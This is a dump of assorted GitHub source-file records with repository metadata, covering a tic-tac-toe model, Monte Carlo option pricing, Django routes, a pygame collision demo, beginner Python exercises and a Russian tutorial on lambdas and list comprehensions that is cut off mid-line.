ax.add_line(matplotlib.lines.Line2D([0, 3], [2, 2], color='grey'))\n for i in range(3):\n for j in range(3):\n k = i+3*j\n if pq[k, 0] == 1:\n ax.add_patch(matplotlib.patches.Circle([i + 0.5, j + 0.5], 0.3, color=col_o, fill=False))\n if pq[k, 1] == 1:\n ax.add_line(matplotlib.lines.Line2D([i + 0.2, i + 0.8], [j + 0.2, j + 0.8], color=col_x))\n ax.add_line(matplotlib.lines.Line2D([i + 0.2, i + 0.8], [j + 0.8, j + 0.2], color=col_x))\n\n\n# This function prints an ASCII art representation of the specified game state\ndef show_board_ascii(pq, winner=None):\n sym_o = 'O'\n sym_x = 'X'\n if winner == 0: sym_x = 'x'\n if winner == 1: sym_o = 'o'\n s = '---\\n'\n for j in range(3):\n for i in range(3):\n k = i+3*(2-j)\n t = '#'\n if pq[k, 0] == 1: t = sym_o\n if pq[k, 1] == 1: t = sym_x\n s = s + t\n s = s + '\\n'\n s = s + '---'\n print(s)\n\n\n# This function plays a game.\n# It assumes that player_o and player_x are functions like\n# random_move, suggest_move, input_move and model_move:\n# they should accept a game state and player index, and \n# return a board position. By default play_game() returns\n# the final board position and the index of the winner \n# (0 for O, 1 for X). If the return_moves argument is true\n# it also returns a list moves = [moves_o, moves_x] \n# specifying the moves taken in order.\ndef play_game(player_o, player_x, return_moves=False):\n pq = empty_board.copy()\n winner = None\n moves_o = []\n moves_x = []\n while True:\n if len(plays(pq)) == 0:\n break\n i = player_o(pq, 0)\n moves_o.append(i)\n if i is None or pq[i, 0] == 1 or pq[i, 1] == 1:\n winner = 1\n break\n add_o(pq, i)\n if has_win(pq, 0):\n winner = 0\n break\n if has_win(pq, 1):\n winner = 1\n break\n if len(plays(pq)) == 0:\n break\n i = player_x(pq, 1)\n moves_x.append(i)\n if i is None or pq[i, 0] == 1 or pq[i, 1] == 1:\n winner = 0\n break\n add_x(pq, i)\n if has_win(pq, 0):\n winner = 0\n break\n if has_win(pq, 1):\n winner = 1\n break\n if return_moves:\n return pq, winner, [moves_o, moves_x]\n else:\n return pq, winner\n\n\n# Here it is assumed that pq is a game state and that the specified\n# player has chosen to play in position i. If that is illegal,\n# then the game ends with no change to the game state and a reward\n# of -5. Otherwise, we update the game state with the chosen move.\n# If this does not lead to an immediate win and there is still some\n# blank space, then we update again with a randomly selected move\n# by the opponent. The reward is now set to be +1 for a win, -1\n# for a loss, and 0 if neither player has won. The function returns:\n# + a boolean value to indicate whether the game has now finished\n# + the reward\n# + the new game state\n# + the position where the opponent played, if applicable.\ndef step(pq, i, player=0):\n if i is None or pq[i, 0] == 1 or pq[i, 1] == 1:\n return True, -5, pq, None\n pq1 = pq + eee[i, player]\n if has_win(pq1, player):\n return True, 1, pq1, None\n if len(plays(pq1)) == 0:\n return True, 0, pq1, None\n j = random_move(pq1, 1-player)\n pq2 = pq1 + eee[j, 1-player]\n if has_win(pq2, 1-player):\n return True, -1, pq1, j\n if len(plays(pq2)) == 0:\n return True, 0, pq2, j\n return False, 0, pq2, j\n\n\n# This function plays a game using model_move vs random_move, but gathers \n# various auxiliary information along the way which can be used for \n# policy gradient learning. 
This is not working correctly at the moment.\n# It is not clear whether the algorithm is incorrect or the training \n# hyperparameters are inappropriate.\ndef play_game_monitored():\n global model\n pq = empty_board.copy()\n grads = None\n game_reward = 0\n loss_fn = tf.keras.losses.get(model.loss)\n moves = [[],[]]\n if np.random.randint(2) == 1:\n move_x = np.random.randint(9)\n moves[1].append(move_x)\n pq = eee[move_x, 1].copy()\n m = 0\n rho = 0.9\n theta = 1\n num_vars = len(model.trainable_variables)\n while True:\n if len(plays(pq)) == 0:\n break\n with tf.GradientTape() as tape:\n prob = model(pq.reshape(1, 9, 2))[0]\n prob1 = prob.numpy().astype('float64')\n prob1 /= prob1.sum()\n choices = range(9)\n move_o = np.random.choice(choices, p=prob1)\n moves[0].append(move_o)\n loss = loss_fn(ee[move_o], prob)\n new_grads = tape.gradient(loss, model.trainable_variables)\n if m == 0:\n grads = new_grads\n else:\n for j in range(num_vars):\n grads[j] = (rho * (1 - theta) * grads[j] + (1 - rho) * new_grads[j])/(1 - theta * rho)\n m = m + 1\n theta = theta * rho\n if move_o is None or pq[move_o, 0] == 1 or pq[move_o, 1] == 1:\n game_reward = -5\n break\n add_o(pq, move_o)\n if has_win(pq, 0):\n game_reward = 1\n break\n if has_win(pq, 1):\n game_reward = -1\n break\n if len(plays(pq)) == 0:\n break\n move_x = random_move(pq, 1)\n moves[1].append(move_x)\n add_x(pq, move_x)\n if has_win(pq, 0):\n game_reward = 1\n break\n if has_win(pq, 1):\n game_reward = -1\n break\n for j in range(num_vars):\n grads[j] = -game_reward * grads[j]\n return game_reward, grads, moves, pq\n\n\n# The function legal_loss(pq, prob) expects pq to be a game state and\n# prob to be a probability vector of length 9, interpreted as the \n# probabilities of playing in positions 0,..,8. It returns the \n# probability of playing an illegal move, i.e. 
of playing in a \n# position that is already occupied.\ndef legal_loss(pq, prob):\n oo = tf.constant([[1],[1]], dtype=tf.float32)\n return tf.reshape(tf.linalg.matmul(tf.reshape(prob,[-1,1,9]),tf.linalg.matmul(pq,oo)),[-1])\n\n\ndef use_legal_loss(on=True):\n global model\n if on:\n model.compile(loss=legal_loss, optimizer=model.optimizer)\n else:\n model.compile(loss=\"categorical_crossentropy\", optimizer=model.optimizer)\n\n\ndef set_learning_rate(r=0.01):\n global model\n tf.keras.backend.set_value(model.optimizer.learning_rate, r)\n\n\n# This function trains the model so that it only plays legal moves.\n# It does not attempt to ensure that the moves are sensible.\ndef train_model_rules():\n global model\n if model is None:\n make_model()\n use_legal_loss(True)\n model.compile(loss=legal_loss, optimizer=model.optimizer)\n st = tf.constant(all_states, dtype=tf.float32)\n model.fit(st, st, epochs=20)\n use_legal_loss(False)\n\n\n# This function trains the model to replicate the behaviour of the\n# suggest_move() function\ndef train_model_suggestions():\n global model\n if model is None:\n make_model()\n use_legal_loss(False)\n model.fit(all_dataset, epochs=EPOCHS)\n\n\n# This function attempts (unsuccessfully, for the moment) to train the \n# model using policy gradient learning.\ndef train_model_reinforce(num_games=10, num_loops=10):\n global model\n if model is None:\n make_model()\n use_legal_loss(False)\n\n num_vars = len(model.trainable_variables)\n for i in range(num_loops):\n total_reward = 0\n print('Loop ' + repr(i))\n grads = []\n for j in range(num_games):\n reward, new_grads, moves, pq = play_game_monitored()\n grads.append(new_grads)\n total_reward += reward\n print('Total reward: ' + repr(total_reward))\n mean_grads = [\n tf.reduce_mean([grads[j][i] for j in range(num_games)],0)\n for i in range(num_vars)\n ]\n model.optimizer.apply_gradients(\n zip(mean_grads, model.trainable_variables)\n )\n\n\n######################################################################\n\n# make_model()\n# train_model_rules()\n\n# model = tf.keras.models.load_model('models/ox_model_20')\n\n# while True:\n# rr, gg, mm, bb = play_game_monitored()\n# print([rr,mm])\n# show_board_ascii(board_from_moves(mm))\n\n# make_Q_model()\n\n# train_Q_once(5,5,5,0.5)\n\nmake_model()\n","repo_name":"NeilStrickland/ml_exact","sub_path":"python/ox.py","file_name":"ox.py","file_ext":"py","file_size_in_byte":20137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7271818459","text":"import math\nfrom mcpele1.montecarlo.template import np\nfrom mcpele1.montecarlo.mc import MC\nfrom mcpele1.takestep.gaussian_coords_displacement import SimpleGaussian\nfrom mcpele1.action.record_energy_time_series import RecordEnergyTimeSeries\n\n\"\"\"\ncreate a Option class to define the potential of the Monte Carlo simulation\n\"\"\"\n\n\n# potential\n\nclass Option:\n def __init__(self, stock_price, strike_price, risk, volatility, tenor, CorP, Steps):\n self.S= stock_price\n self.K = strike_price\n self.r = risk\n self.v = volatility\n self.T = tenor\n self.CorP = CorP\n self.Steps = Steps#dimension\n\n def get_energy(self, x, mcrunner):\n deltaT = self.T/self.Steps\n y = self.S\n for i in range(0, len(x)):\n\n y= y*math.exp(((self.r-((self.v*self.v)/2))*deltaT)+ (self.v*math.sqrt(deltaT)*x[i]))\n\n return y\n \n \n\nclass Option_Price:\n energy_list: np.ndarray\n S= 50\n K = 50\n r = 0.05\n v =0.5\n T =1\n CorP = \"C\"\n Steps = 100 \n samples = 10000\n\n def 
__init__(self):\n #steps and dimension\n self.ndim = self.Steps #proxy for number of time steps, linearly the system in one dimensional\n self.samples = self.samples\n self.potential = Option(self.S, self.K, self.r, self.v, self.T, self.CorP, self.Steps)\n #setting up the simulator\n self.mc = MC(self.potential, np.zeros(self.ndim), 1)\n #generating coords(normal random numbers)\n self.takestep = SimpleGaussian(42, self.ndim)\n self.mc.set_take_step(self.takestep)\n self.Recorded_Energy = RecordEnergyTimeSeries(1,1)\n #collecting all energies of each simulation\n self.mc.add_action(self.Recorded_Energy)\n self.mc.run(self.samples)\n self.energy_list = np.array(self.Recorded_Energy.get_energy_time_series())\n\nif __name__ == \"__main__\":\n optprc = Option_Price()\n energy_l = optprc.energy_list\n #Substract with stock price and remove all negatives\n energy_l = energy_l - optprc.K\n energy_l[energy_l<0]=0\n ans = np.sum(energy_l)/optprc.samples*math.exp(-optprc.r*optprc.T )\n print(\"option price:\",ans )\n","repo_name":"MohammedZayyam/mcpele1","sub_path":"example/calculate_option_price.py","file_name":"calculate_option_price.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"36045360507","text":"from django.conf.urls import patterns, url\n\nfrom students.views import (GroupListView, GroupDetailsView, EditGroupView,\n EditStudentView, DeleteStudent, DeleteGroup)\n\n\nurlpatterns = patterns('',\n url(r'^$', GroupListView.as_view(),\n name='index-students'),\n url(r'^groups/$', GroupListView.as_view(),\n name='group_list-students'),\n url(r'^group/(?P\\d+)/$', GroupDetailsView.as_view(),\n name='group_details-students'),\n\n url(r'^group/add/$', EditGroupView.as_view(),\n name='group_add-students'),\n url(r'^group/(?P\\d+)/edit/$', EditGroupView.as_view(),\n name='group_edit-students'),\n\n url(r'^student/(?P\\d+)/edit/$', EditStudentView.as_view(),\n name='student_edit-students'),\n url(r'^student/add/$', EditStudentView.as_view(),\n name='student_add-students'),\n\n url(r'^group/(?P\\d+)/delete$', DeleteGroup.as_view(),\n name='delete_group-students'),\n url(r'^student/(?P\\d+)/delete$', DeleteStudent.as_view(),\n name='delete_student-students'),\n)\n","repo_name":"purintibkaew/db-management","sub_path":"apps/students/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"27724100968","text":"version = list(map(int, input().split(\".\")))\r\n\r\nversion[-1] += 1\r\nif version[-1] == 10:\r\n version[-1] = 0\r\n version[-2] += 1\r\nif version[-2] == 10:\r\n version[-2] = 0\r\n version[-3] += 1\r\n\r\nprint(\".\".join(str(number) for number in version))\r\n\r\n\r\n\r\n","repo_name":"slavcho179/SoftUniCourse","sub_path":"Fundamentals/DataStructures/Lists/ListAdvanced/next_version.py","file_name":"next_version.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"29"} +{"seq_id":"6641804242","text":"# This script wraps the innerhtml string of a page with the appropriate , and tags.\n# This would enable Tika to parse it correctly. 
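# On a single string the wrapping amounts to the following (a sketch; the
# exact tag literals are not spelled out above, so the usual
# <html>/<head>/<body> wrapper is assumed here):

fragment = "<p>scraped inner HTML</p>"
wrapped = "<html><head></head><body> " + fragment + " </body></html>"
print(wrapped)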
\n\nimport sys\nimport os\n\ndef list_files(dir): \n r = [] \n subdirs = [x[0] for x in os.walk(dir)] \n for subdir in subdirs: \n files = os.walk(subdir).next()[2] \n if (len(files) > 0): \n for file in files: \n r.append(subdir + \"/\" + file) \n return r \n\ndef log(msg):\n\tprint(msg)\n\ndef main(argv=None):\n\targv = sys.argv[1:]\n\ttry:\n\t\tinputDir = argv[0]\n\t\toutputDir = argv[1]\n\t\tappendString = argv[2]\n\texcept:\n\t\tprint(\"Usage \")\n\t\texit()\n\tlog(\"Setting input dir as %s and outputDir as %s\"%(inputDir, outputDir))\n\tif not os.path.exists(outputDir):\n\t\tos.makedirs(outputDir)\n\n\tfiles = list_files(inputDir)\n\tfor file in files:\n\t\twith open(file,\"r\") as f:\n\t\t\tlog(\"Processing file \" + f.name)\n\t\t\tcontent = f.read()\n\t\t\tcontent = \" \" + content + \"\"\n\t\t\toutFile = outputDir+\"/\" + appendString + os.path.basename(file)+\".html\"\n\t\t\twith open(outFile,\"w\") as out:\n\t\t\t\tlog(\"Writing file \" + os.path.basename(outFile))\n\t\t\t\tout.write(content)\n\t\t\t\tos.utime(outFile, (os.path.getctime(file), os.path.getctime(file)))\n\t\t\t\tout.close()\n\t\t\tf.close()\n\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"sujen1412/memex-scripts","sub_path":"html-cca-converter/html_converter.py","file_name":"html_converter.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"74771715279","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\n\n\n# In[2]:\n\n\npd.read_excel('data.xlsx')\n\n\n# In[3]:\n\n\nb=pd.read_excel('data.xlsx',index_col='Date')\nb\n\n\n# In[4]:\n\n\na=pd.Series([1,2,3])\na.sum()\n\n\n# In[5]:\n\n\nb.sum()\n\n\n# In[6]:\n\n\nb.sum(axis='index')\n\n\n# In[7]:\n\n\nb.sum(axis=0)\n\n\n# In[8]:\n\n\nb.sum(axis=1)\n\n\n# In[9]:\n\n\nb.sum(axis='columns')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"fozouni/data_science","sub_path":"Code Session 9 Pandas.py","file_name":"Code Session 9 Pandas.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"29"} +{"seq_id":"21127384375","text":"from mysql_connector import connection\nimport menu\n\n# adds publisher to table\ndef addPublisher(name, phone, city):\n cursor = connection.cursor()\n query = \"SELECT EXISTS(SELECT name FROM Publisher WHERE name = %s)\"\n record = (name, )\n cursor.execute(query, record)\n \n result = cursor.fetchall()\n \n if str(result) == \"[(1,)]\":\n return \"Publisher already exists.\"\n \n else: \n query = \"\"\"INSERT INTO Publisher(name, phone, city) VALUES (%s, %s, %s)\"\"\"\n record = (name, phone, city)\n cursor.execute(query, record)\n \n connection.commit()\n result = \"Added \" + str(cursor.rowcount) + \" publisher to table.\\n\"\n return (result)\n \n\n","repo_name":"fjosea10/BookManager","sub_path":"publisher_dao.py","file_name":"publisher_dao.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26738740444","text":"# print all integers from 0 to 150\ni = 0\nwhile i <= 150:\n print(i)\n i = i+1\n\n# print all the multiples of 5 from 5 to 1,000\ni = 0\nwhile i <= 1000:\n print(i)\n i = i + 5\n\n# print integers 1 to 100 if divisible by 5, pirnt \"Coding\" instead. 
if divisible by 10, print \"Coding Dojo\"\ni = 1\nwhile i <= 100:\n if i%10 == 0:\n print('Coding Dojo')\n elif i%5 == 0:\n print('Coding')\n else:\n print(i)\n i = i+1\n\n# add odd integers from 0 to 500,000 and print the final sum\ni = 1\nsum = 0\nwhile i < 500000:\n if i > 500000-2:\n print(sum)\n sum = sum + i\n i = i + 2\n\n# print positive numbers starting at 2018, counting donw by fours\ni = 2018\nwhile i > 0:\n print(i)\n i = i - 4\n\n# set three variables:lowNum, highNum, mult, starting at lowNum and going through highNum, print only the integers that are a multiple of mult\nlowNum = 3\nhighNum = 30\nmult = 3\nx = 0\nfor x in range(lowNum, highNum + 1, mult):\n print(x)","repo_name":"zionhjs/11-25-Python","sub_path":"tests/for_loop.py","file_name":"for_loop.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41692117042","text":"import pygame as pg\nfrom math import floor, ceil\n\n\npg.font.init()\n\n\nWIN_WIDTH, WIN_HEIGHT = 1920, 1080\nBLOCK_SIZE = 60\nGRID_SIZE = 16\nGRID_START = ((WIN_WIDTH - BLOCK_SIZE * GRID_SIZE) / 2, (WIN_HEIGHT - BLOCK_SIZE * GRID_SIZE) / 2)\nPLAYER_SPEED = .01\n\nBACKGROUND_COLOR = (50, 50, 50)\nGRID_COLOR = (150, 150, 150)\nSELECTION_COLOR = (75, 75, 75)\nWALL_SELECTION_COLOR = (125, 125, 125)\nWALL_COLOR = (150, 150, 150)\nTEXT_COLOR = (255, 255, 255)\nPLAYER_COLOR = (0, 0, 255)\nAABB_COLOR = (255, 0, 0)\nLINE_HEIGHT = 24\nLINE_WIDTH = 2\n\nEMPTY = 0\nWALL = 1\n\nFONT = pg.font.SysFont(\"Arial\", 24)\n\n\ndef to_screen_coords(grid_coords):\n return int(GRID_START[0] + grid_coords[0] * BLOCK_SIZE), \\\n int(GRID_START[1] + grid_coords[1] * BLOCK_SIZE)\n\n\n# Not perfect, but works pretty fine\nclass AABB:\n def __init__(self, pos, size):\n self.pos = pos\n self.size = size\n self.last_pos = pos\n self.delta = (0, 0)\n\n # Moves the box immediately\n def move(self, dx, dy):\n self.pos = (self.pos[0] + dx, self.pos[1] + dy)\n self.delta = (self.delta[0] + dx, self.delta[1] + dy)\n\n # But then resolves the collision moving the box along one axis at a time\n def collide(self, others):\n self.pos = self.last_pos\n\n self.pos = (self.pos[0], self.last_pos[1] + self.delta[1])\n for other in others:\n if self.delta[1] != 0 and other.pos[0] - self.size[0] < self.pos[0] < other.pos[0] + other.size[0]:\n if self.delta[1] > 0 and self.last_pos[1] <= other.pos[1] - self.size[1] < self.pos[1]:\n self.pos = (self.pos[0], other.pos[1] - self.size[1])\n elif self.pos[1] < other.pos[1] + other.size[1] <= self.last_pos[1]:\n self.pos = (self.pos[0], other.pos[1] + other.size[1])\n\n self.pos = (self.last_pos[0] + self.delta[0], self.pos[1])\n for other in others:\n if self.delta[0] != 0 and other.pos[1] - self.size[1] < self.pos[1] < other.pos[1] + other.size[1]:\n if self.delta[0] > 0 and self.last_pos[0] <= other.pos[0] - self.size[0] < self.pos[0]:\n self.pos = (other.pos[0] - self.size[0], self.pos[1])\n elif self.pos[0] < other.pos[0] + other.size[0] <= self.last_pos[0]:\n self.pos = (other.pos[0] + other.size[0], self.pos[1])\n\n self.last_pos = self.pos\n self.delta = (0, 0)\n\n\ndef main():\n screen = pg.display.set_mode((1920, 1080))\n pg.display.set_caption(\"Physics\")\n\n def text(line, value):\n screen.blit(\n FONT.render(value, True, TEXT_COLOR),\n (10, 10 + line * LINE_HEIGHT)\n )\n\n def block(coords, color):\n screen_coords = to_screen_coords(coords)\n pg.draw.rect(\n screen, color,\n pg.Rect(\n screen_coords[0],\n screen_coords[1],\n BLOCK_SIZE, 
BLOCK_SIZE\n )\n )\n\n def aabb(box, color):\n pos = to_screen_coords(box.pos)\n pg.draw.rect(\n screen, color,\n pg.Rect(\n pos[0] + LINE_WIDTH,\n pos[1] + LINE_WIDTH,\n box.size[0] * BLOCK_SIZE - LINE_WIDTH,\n box.size[1] * BLOCK_SIZE - LINE_WIDTH\n ), LINE_WIDTH\n )\n\n grid = [[EMPTY for y in range(GRID_SIZE)] for x in range(GRID_SIZE)]\n player = AABB((.125, .125), (.75, .75))\n\n while True:\n for e in pg.event.get():\n if e.type == pg.QUIT:\n return\n\n screen.fill(BACKGROUND_COLOR)\n\n mouse_real_x, mouse_real_y = pg.mouse.get_pos()\n sel_x = floor((mouse_real_x - GRID_START[0]) / BLOCK_SIZE)\n sel_y = floor((mouse_real_y - GRID_START[1]) / BLOCK_SIZE)\n\n if 0 <= sel_x < GRID_SIZE and 0 <= sel_y < GRID_SIZE:\n pressed_buttons = pg.mouse.get_pressed()\n if pressed_buttons[0]:\n grid[sel_x][sel_y] = EMPTY\n elif pressed_buttons[2]:\n grid[sel_x][sel_y] = WALL\n\n pressed_keys = pg.key.get_pressed()\n\n if pressed_keys[pg.K_w]:\n player.move(0, -PLAYER_SPEED)\n elif pressed_keys[pg.K_s]:\n player.move(0, PLAYER_SPEED)\n\n if pressed_keys[pg.K_a]:\n player.move(-PLAYER_SPEED, 0)\n elif pressed_keys[pg.K_d]:\n player.move(PLAYER_SPEED, 0)\n\n aabbs = []\n \n for x in range(floor(player.pos[0]), floor(player.pos[0] + player.size[0]) + 1):\n for y in range(floor(player.pos[1]), floor(player.pos[1] + player.size[1]) + 1):\n if 0 <= x < GRID_SIZE and 0 <= y < GRID_SIZE and grid[x][y] == WALL:\n aabbs.append(AABB((float(x), float(y)), (float(1), float(1))))\n\n player.collide(aabbs)\n\n # Draw selection and walls\n\n for x in range(0, GRID_SIZE):\n for y in range(0, GRID_SIZE):\n if grid[x][y] == WALL:\n block((x, y), WALL_COLOR)\n\n if 0 <= sel_x < GRID_SIZE and 0 <= sel_y < GRID_SIZE:\n block((sel_x, sel_y), SELECTION_COLOR if grid[sel_x][sel_y] == EMPTY else WALL_SELECTION_COLOR)\n\n # Draw grid\n\n for x in range(0, GRID_SIZE + 1):\n pg.draw.line(\n screen, GRID_COLOR,\n to_screen_coords((x, 0)),\n to_screen_coords((x, GRID_SIZE))\n )\n\n pg.draw.line(\n screen, GRID_COLOR,\n to_screen_coords((0, x)),\n to_screen_coords((GRID_SIZE, x))\n )\n\n # Draw AABBs\n\n aabb(player, PLAYER_COLOR)\n for box in aabbs:\n aabb(box, AABB_COLOR)\n\n pg.display.flip()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"linewelder/mycraft-old","sub_path":"sketches/physics.py","file_name":"physics.py","file_ext":"py","file_size_in_byte":5741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"28918708441","text":"import pandas as pd\n\n'''\nUsing and sorting a multi-column index\n'''\n\ndef main(): \n df = pd.read_csv(\"data/phone_extensions.txt\", sep=r\"\\s+\", engine=\"python\")\n df.set_index(['FirstName', 'LastName'])\n df.sort_values(['LastName', 'FirstName'], inplace=True)\n print(df)\n\nmain()\n","repo_name":"seddon-software/python-course","sub_path":"src/16 Scientific Libraries/04 Pandas Advanced/12.multiindex.py","file_name":"12.multiindex.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"72985389199","text":"# ====================\n# Часть 1: lambda-функции, функции map и filter\n# ====================\n\n# массив слов для демонстрации работы алгоритмов сортировки\nword_list = [\"а\", \"автомат\", \"авто\", \"авиа\", \"ар\"]\n\n# по умолчанию функция сортировки списков list.sort() сортирует элементы списка как числа - по возрастанию или убыванию,\n# поэтому при сортировке строк работает следующий алгоритм: у каждой буквы в 
таблице символов есть свой числовой код.\n# Алгоритм сортировки (сортировка по возрастанию): # 1) берет первую букву каждого слова, определяет ее код,\n# 2) первым элементом в списке становится слово, начинающееся с наименьшего кода, 3) если таких слов несколько, берется следующая буква всех подходящих слов и определяется наименьший код до тех пор, пока не найдется следующее слово. Пример:\n# а, автомат, авто, авиа, ар -> а | автомат, авто, авиа, ар\n# автомат, авто, авиа, ар -> автомат, авто, авиа | ар (\"р\" 0xF0 имеет больший код, чем \"в\" 0xE2) -> авиа | автомат, авиа\n# и т.д.\n\nword_list.sort()\nprint(word_list)\n# вернет: а, авиа, авто, автомат, ар. То есть длина слова не влияет на результат сортировки\n\n# тем не менее, можно изменить поведение функции list.sort, написав собственную функцию сортировки:\n# кастомная функция сортировки. Возвращает длину слова, которую и использует list.sort\ndef sort_by_len(word):\n\treturn len(word)\n\nword_list.sort(key=sort_by_len)\n# вернет: а, ар, авто, авиа, автомат\nprint(word_list)\n\n# того же самого результата можно добиться, не загромождая свой код простыми маленькими функциями\n# lambda-функции - это функции, которые а) не имеют имени, б) создаются непосредственно в месте использования и сразу уничтожаются, в) записываются в одну строку, г) всегда возвращает значение, но без ключевого слова return\n\n# реализация кастомной сортировки того же списка при помощи lambda-фукции\nword_list.sort(key=lambda x: len(x))\n# вернет: а, ар, авто, авиа, автомат\nprint(word_list)\n\n# запись lambda x: len(x) эквивалентна\n# def sort_by_len(word):\n# \treturn len(word)\n\n# lambda-функцию можно присвоить переменной и тогда она не удалится. хотя все равно останется безымянной\nsort_by_len = lambda x: len(x)\nword_list.sort(key=sort_by_len)\n\n# функцию можно удалить так же, как любой другой объект:\ndel sort_by_len\n\n# для того, чтобы распространить функцию на все элементы списка, используются две функции:\n# filter - фильтр по условию. Если для элемента условие True, то элемент остается в списке. Если False - элемент пропускается\n# map - производит вычисление над каждым элементом списка\n# обе фукнции принимают два аргумента: 1) функция для обработки, 2) переменная, содержащая данные для обработки\n\n# создаем тестовый список numbers с числами от 0 до 99\nnumbers = list(range(0, 100))\n\n# выводим только четные числа (делятся на 2 без остатка)\n# вот так работает механизм, заложенный в функцию filter:\ndef check_even():\n\tfor number in numbers:\n\t\tif number %2 == 0:\n\t\t\treturn number\n\t\telse:\n\t\t\treturn False\n\n# пример отбора четных чисел из списка функцией filter:\neven_list = list(filter(lambda x: x%2 == 0, numbers))\nprint(even_list)\n\n# lambda-функцию можно запустить сразу в месте объявления. Передача параметра будет выглядеть так (проверка числа на четность):\nprint((lambda x: x%2 == 0)(2))\n\n# пример вычисления над каждым элементом списка. вычисление квадратов чисел функцией map:\nsquare_list = list(map(lambda x: x*x, numbers))\nprint(square_list)\n\n# пример вычисления над каждым элементом списка. вычисление квадратов чисел функцией map с условием - обрабатываем только четные числа:\nsquare_list = list(map(lambda x: x*x if x%2 == 0 else None, numbers))\n# на месте нечетных чисел будет значение, задаваемое в условии else, т.к. функция map, в отличие от filter, не умеет пропускать значения\nprint(square_list)\n\n# пример совместного использования map и filter. 
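# The combined map+filter pipeline on the next line can also be written as a
# single list comprehension; a quick equivalence check on a small range:

numbers_demo = range(10)
via_functions = list(filter(lambda s: s is not None,
                            map(lambda x: x * x if x % 2 == 0 else None, numbers_demo)))
via_comprehension = [x * x for x in numbers_demo if x % 2 == 0]
print(via_functions == via_comprehension)  # True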
результатом будут все четные числа, возведенные в квадрат\nsquare_list_filtered = list(filter(lambda x: x is not None, map(lambda x: x*x if x%2 == 0 else None, numbers)))\nprint(f\"Совместное использование функций map и filter\\n {square_list_filtered}\")\n\n# ====================\n# Часть 2: генераторы списков\n# ====================\n\n# генераторы списков - специальный механизм Python, позволяющий создавать на лету новые списки как результат фильтрации или вычислений\n# применяются ТОЛЬКО к типу list!\n# следующее выражение даст тот же результат, что и функция filter над массивом numbers\neven_list2 = [x for x in numbers if x%2 == 0]\nprint(even_list2)\n\n# а это генератор - аналог функции map\neven_list3 = [x if x%2 == 0 else None for x in numbers]\nprint(even_list3)\n\n\n# ====================\n# Часть 3: практическое применение: работа с текстами\n# ====================\n\n# МАТЧАСТЬ: стоп-слова - это слова, не несущие смысловой нагрузки (предлоги, союзы, местоимения, частицы), которые можно устранить без потери содержания\n# водность текста - процентное содержание незначащих \"стоп-слов\"\n# https://contentmonster.ru/ur-6-vodnost-teksta\n# Водность текста 100%\n# Вот это да! Как быстро все вокруг стало невероятно великолепным теперь для меня! У меня никогда больше, наверное, не будет такого, как сегодня, когда мое «Я» стало менее важным, чем что-то другое. Ещё недавно мне никто не был нужен, я хотел быть один. А теперь я могу, наконец, думать о тебе и знать, что ты для меня – самое главное. Теперь у меня есть ты, и я понимаю: лучшее, что можно сделать �� это быть с тобой рядом!\n\n# Водность текста – 0%\n# Иваненко Павел Анатольевич. Место рождения – Иркутск. Образование – Национальный Исследовательский Иркутский государственный технический университет. Специальность - Конструкторско-технологическое обеспечение машиностроительных производств. Иностранные языки – французский, немецкий, английский. Любвеобилен. Характер – мягкий, податливый. Холост. Предпочитает интернет-общение. Носит одежду пастельных тонов. Злоупотребляет алкоголем. Коммуникабельный, ответственный, вежливый, доброжелательный, занудный.\n\n# Попробуйте самостоятельно оценить водность следующего текста:\n# Истинный ариец. Характер - нордический, выдержанный. С товарищами по работе поддерживает хорошие отношения. Безукоризненно выполняет свой служебный долг. Беспощаден к врагам Рейха. Отличный спортсмен: чемпион Берлина по теннису. Холост; в связях, порочащих его, замечен не был. Отмечен наградами фюрера и благодарностями рейхсфюрера СС.\n\n# задача: разбить предложенный текст на слова, написав минимум кода. посторонние символы удалить. стоп-слова удалить. регулярные выражения использовать нельзя\n# для простоты считаем, что у нас нет словаря стоп-слов, поэтому стоп-словами будем считать все слова короче 6 символов\n\ntext = \"Вы должны войти в эту сеть перед тем как сможете получить доступ в Интернет. Этот сайт использует Форсированное защищённое соединение HTTP (HSTS), чтобы указать, что Firefox должен подключаться к нему только через защищённое соединение. В результате, добавление исключения для этого сертификата невозможно.\"\n\n# избавляемся от прописных букв\ntext = text.lower()\n# оставляем только слова на русском и английском языке. 
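# A standalone illustration of the character-level filter applied on the next
# line (same keep-conditions: Cyrillic а-я, Latin a-z, 'ё', and space):

sample = "Привет, Python 3!"
kept = "".join(c for c in sample.lower() if "а" <= c <= "я" or "a" <= c <= "z" or c in "ё ")
print(kept)  # prints "привет python " (digits and punctuation removed)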
